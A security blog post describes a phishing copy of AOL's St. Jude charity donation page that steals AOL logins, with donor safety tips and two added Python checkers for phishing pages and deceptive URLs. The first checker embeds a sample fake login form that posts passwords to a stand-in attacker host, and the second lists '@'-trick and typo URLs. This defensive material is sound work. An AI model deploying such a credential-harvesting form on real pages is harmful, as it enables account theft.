19/12/2013

Charity scam: do some good – but don't get hoodwinked!

Social engineering

Today's warning concerns the well-known online service AOL. The American Internet company places great store on corporate social responsibility and describes many of the projects it has supported on a website set up specifically for that purpose. One project that has been close to AOL's heart since 2007 is the St. Jude Children's Research Hospital. Besides reporting on its activities for the benefit of the hospital, the company also runs display adverts to generate further donations. One such advert looks like this:
By clicking on "Donate Now", the website visitor is taken to the St. Jude online shop, where donations can be made via a variety of payment methods.

The fraudsters' scam

In the current case the fraudsters are not after the payment data of eager donors but after AOL login data. They have built a website that is almost identical to the original and added a fake AOL login form: everything entered into it is sent to the attackers rather than to AOL. The copy used in this example was planted on a French WordPress blog, almost certainly without the blog operator's knowledge; a compromised third-party site costs the attacker nothing and lends the page an unrelated, harmless-looking domain.
With AOL account credentials in hand, the criminals have plenty of options. They can send spam through the service's mail and web services under the victim's identity, or sell the credentials together with the associated personal data on the black market. Either way, it is the phishing victim whose account the abuse is traced back to, and who is left looking like the "black sheep".
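The mechanism described above, a login form embedded in a copied page that posts the entered credentials to the attackers, leaves traces that can be checked mechanically. The following is an added example and is not code from the original article or from AOL; the page URL, host names and HTML are constructed to resemble the case (a copy hosted under a WordPress upload path on someone else's blog, with a password form whose action points off-site), and the heuristics are ones a practitioner would use for a first triage, not a complete phishing detector.

```python
"""Triage heuristics for a suspected credential-phishing page (added example).

All names below are constructed: blog.example.fr stands in for the compromised
blog, collector.example.net for the attackers' collection endpoint.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: page served from a third-party blog, form posts elsewhere.
PAGE_URL = "http://blog.example.fr/wp-content/uploads/aol/login.html"
SAMPLE_HTML = """
<html><body>
<h1>Sign in to AOL to donate</h1>
<form method="post" action="http://collector.example.net/grab.php">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Sign In">
</form>
</body></html>
"""


class FormCollector(HTMLParser):
    """Collect each <form>'s action plus the input types/names inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            itype = (a.get("type") or "text").lower()
            self._current["inputs"].append((itype, a.get("name") or ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def registrable_domain(host):
    """Crude 'last two labels' approximation; a real tool uses the public suffix list."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def triage(page_url, html, expected_domain):
    """Return a list of findings explaining why the page looks like a credential trap.

    An empty list means none of the heuristics fired, not that the page is safe.
    """
    findings = []
    page_host = urlsplit(page_url).hostname or ""
    if registrable_domain(page_host) != expected_domain:
        findings.append(f"page is hosted on {page_host}, not under {expected_domain}")
    if "/wp-content/" in page_url or "/wp-includes/" in page_url:
        findings.append("page lives inside a WordPress upload/include path")
    parser = FormCollector()
    parser.feed(html)
    for form in parser.forms:
        types = {t for t, _ in form["inputs"]}
        if "password" not in types:
            continue  # not a credential form, ignore
        action_url = urljoin(page_url, form["action"])
        action_host = urlsplit(action_url).hostname or ""
        if registrable_domain(action_host) != registrable_domain(page_host):
            findings.append(f"password form posts off-site to {action_host}")
        if urlsplit(action_url).scheme != "https":
            findings.append("password form submits over plain http")
    return findings


if __name__ == "__main__":
    for f in triage(PAGE_URL, SAMPLE_HTML, "aol.com"):
        print("-", f)
```

Run against the constructed sample, all four heuristics fire: wrong hosting domain, WordPress path, off-site form action, and an unencrypted submission. Against the real donation page the same function should return nothing, which is the point of having a positive and a negative case when tuning such checks.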


Hints and tips on donating and preventing phishing

  • Enter the addresses of websites and login pages manually, or use your browser's favourites or bookmark function.
    • Be especially careful not to make spelling mistakes when typing an address. Attackers anticipate them and register typo domains for exactly this purpose.
  • When registering, use complex passwords and a separate password for each service, so that one phished login does not open the others.
  • Be wary of emails from senders you do not know.
    • Do not click on links in them: the page they lead to may host malware or a phishing trap.
  • Trustworthy companies and institutions will never ask you for login credentials or personal information by email.
  • Do not blindly trust advertisements on websites saying things such as "your donation is guaranteed to go directly to those that need it" and similar phrases to lure you in. Look carefully at who is behind the website. Is it a legitimate company or organisation?
  • Does the organisation asking for donations look legitimate and transparent? Is there contact information, contact names, financial reports? Can you access information on them? Is the organisation even a registered charity?
  • Look for a quality seal. In Germany, for example, this could be the donation seal of the Deutsches Zentralinstitut für soziale Fragen (German Central Institute for Social Issues, DZI); in the UK, check that the organisation appears on the register of the Charity Commission. Not every legitimate charity has a seal or certificate, but those that do have been checked by an independent body. Bear in mind that the criteria for issuing such marks vary.
  • When donating online, exactly as with online shopping, look out for the security features that modern browsers display in varying forms:
    • The correct web address is shown, and the part just before the top-level domain is the organisation's own domain. A brand name appearing earlier in the address, for example as a subdomain of some other domain, proves nothing.
    • The address begins with "https", meaning the connection is encrypted.
    • In many modern browsers the address bar is highlighted in green; this indicates an Extended Validation certificate, for which the certificate authority has verified the organisation whose name is displayed.
    • The site certificate is valid, indicated by a padlock in many browsers. Note that "https" and the padlock only confirm that the connection is encrypted and that the certificate matches the host name in the address bar; they do not confirm that this host belongs to the organisation you mean, and a phishing site can present a perfectly valid certificate for its own domain.
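The address-bar checks in the list above, together with the typo-domain warning earlier in the list, can be written down as a small function. The following is an added example and is not code from the original article; the expected domain and the sample URLs are constructed for illustration, and the "registrable domain" helper is a deliberate simplification (it takes the last two labels, which is right for .org and .com but not for suffixes such as co.uk, where a real tool would consult the public suffix list).

```python
"""Check a donation or login URL against the address-bar checklist (added example)."""
from urllib.parse import urlsplit


def registrable_domain(host):
    """Last two labels; adequate for .com/.org, not for ccSLDs like co.uk (simplification)."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def edit_distance(a, b):
    """Levenshtein distance, used to spot one- or two-keystroke typo domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,           # deletion
                           cur[j - 1] + 1,        # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def check_url(url, expected_domain):
    """Return (ok, reasons). ok is True only when every checklist item passes.

    expected_domain is the organisation's registrable domain, e.g. "stjude.org"
    (a constructed assumption for this example, not taken from the article).
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reasons = []
    if parts.scheme != "https":
        reasons.append("not https")
    reg = registrable_domain(host)
    brand = expected_domain.split(".")[0]
    if reg != expected_domain:
        if brand in host:
            # The brand appears, but only as a subdomain or inside another name.
            reasons.append(f"brand name appears in '{host}' but the registrable domain is '{reg}'")
        elif edit_distance(reg, expected_domain) <= 2:
            reasons.append(f"'{reg}' is a near-miss of '{expected_domain}' (likely typo domain)")
        else:
            reasons.append(f"registrable domain '{reg}' is not '{expected_domain}'")
    # "https://www.stjude.org@evil.example/" puts the brand in the userinfo part;
    # the browser connects to evil.example.
    if parts.username is not None:
        reasons.append("URL contains a user@ part before the real host")
    return (not reasons, reasons)


if __name__ == "__main__":
    for u in ("https://www.stjude.org/donate",
              "http://stjude.org.donate-now.example/login",
              "https://stjdue.org/",
              "https://www.stjude.org@evil.example/donate"):
        print(u, "->", check_url(u, "stjude.org"))
```

The second sample URL is the pattern the list warns about: the real domain appears at the start of the host name, but the browser is actually talking to donate-now.example. The third is a transposition typo, and the fourth hides the real host behind an "@", a trick that older browsers rendered less conspicuously than current ones.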